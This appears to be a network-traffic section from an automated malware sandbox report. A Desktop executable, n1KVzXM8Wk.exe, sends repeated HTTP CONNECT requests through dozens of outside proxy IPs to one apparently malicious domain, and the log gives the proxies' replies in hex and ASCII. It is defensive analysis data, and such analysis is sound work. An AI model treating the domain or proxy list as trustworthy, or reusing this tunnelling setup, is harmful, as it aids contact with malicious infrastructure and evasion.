                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178196907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.682993889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.680964947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.680713892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.681435108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.683835983 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.368479013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.553018093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1199192.168.2.45259027.75.149.16910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.596059084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1200192.168.2.45332158.234.116.19781976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.597330093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1201192.168.2.453403161.97.147.193372576812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.603494883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.055232048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1202192.168.2.453418162.243.102.20797646812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.616328001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1203192.168.2.45336147.98.151.6161446812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.654694080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1204192.168.2.453365115.223.11.212500006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.663206100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.857355118 CET39INHTTP/1.0 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1205192.168.2.45340658.75.126.23541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.681809902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1206192.168.2.45260041.65.236.3519766812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.696154118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.865581036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.866120100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.866017103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.881201029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.881155968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.959384918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1207192.168.2.45350549.51.93.2224436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.711719036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1208192.168.2.45350749.51.93.2224436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.712727070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1209192.168.2.45351149.51.93.2224436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.713579893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1210192.168.2.45351249.51.93.2224436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.714421988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1211192.168.2.4534158.217.187.52240026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.732428074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1212192.168.2.453357124.163.236.5473026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.760025024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.220400095 CET90INHTTP/1.1 200 OK
                                                                                                      Content-Type: application/json
                                                                                                      Connection: close
                                                                                                      Content-Length: 55


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1213192.168.2.452621139.99.35.21311806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.763333082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.834628105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.834829092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.859005928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1214192.168.2.453263184.170.249.6541456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.765620947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1215192.168.2.45343668.71.249.153486066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.775902987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1216192.168.2.453539172.67.181.144806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.821630001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.909096003 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1217192.168.2.452697192.99.37.195385396812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.824980021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1218192.168.2.453419103.216.49.15180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.829035044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1219192.168.2.452632103.174.236.7780806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.830722094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.699261904 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1220192.168.2.453450141.94.174.6504706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.835159063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1221192.168.2.45347594.142.137.20397416812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.851910114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.443766117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.129618883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.219358921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.241034031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.753145933 CET132INHTTP/1.1 503 Too many open connections
                                                                                                      Content-Type: text/plain
                                                                                                      Connection: close
                                                                                                      Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                      Data Ascii: Maximum number of open connections reached.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1222192.168.2.452681162.240.21.140463956812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.854836941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.865812063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.866116047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.866017103 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.881292105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.881182909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:13.959315062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1223192.168.2.45345546.101.186.238806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.857095957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.031482935 CET831INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Server: Apache/2.4.29 (Ubuntu)
                                                                                                      Content-Length: 639
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1224192.168.2.453402220.194.189.14431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.857716084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:56.341933966 CET317INHTTP/1.1 502 Bad Gateway
                                                                                                      Server: ZZY_WEB/20.08.18
                                                                                                      Date: Fri, 23 Feb 2024 09:08:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 161
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 5a 5a 59 5f 57 45 42 2f 32 30 2e 30 38 2e 31 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>ZZY_WEB/20.08.18</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1225192.168.2.45348292.205.61.38292496812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.863054991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1226192.168.2.453500146.190.35.6380006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.864211082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.031356096 CET19INHTTP/1.0 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1227192.168.2.453426139.59.99.83806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.866786003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.207118034 CET891INHTTP/1.1 400 Bad Request
                                                                                                      content-type: text/html
                                                                                                      cache-control: private, no-cache, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-length: 679
                                                                                                      date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      server: LiteSpeed
                                                                                                      connection: close
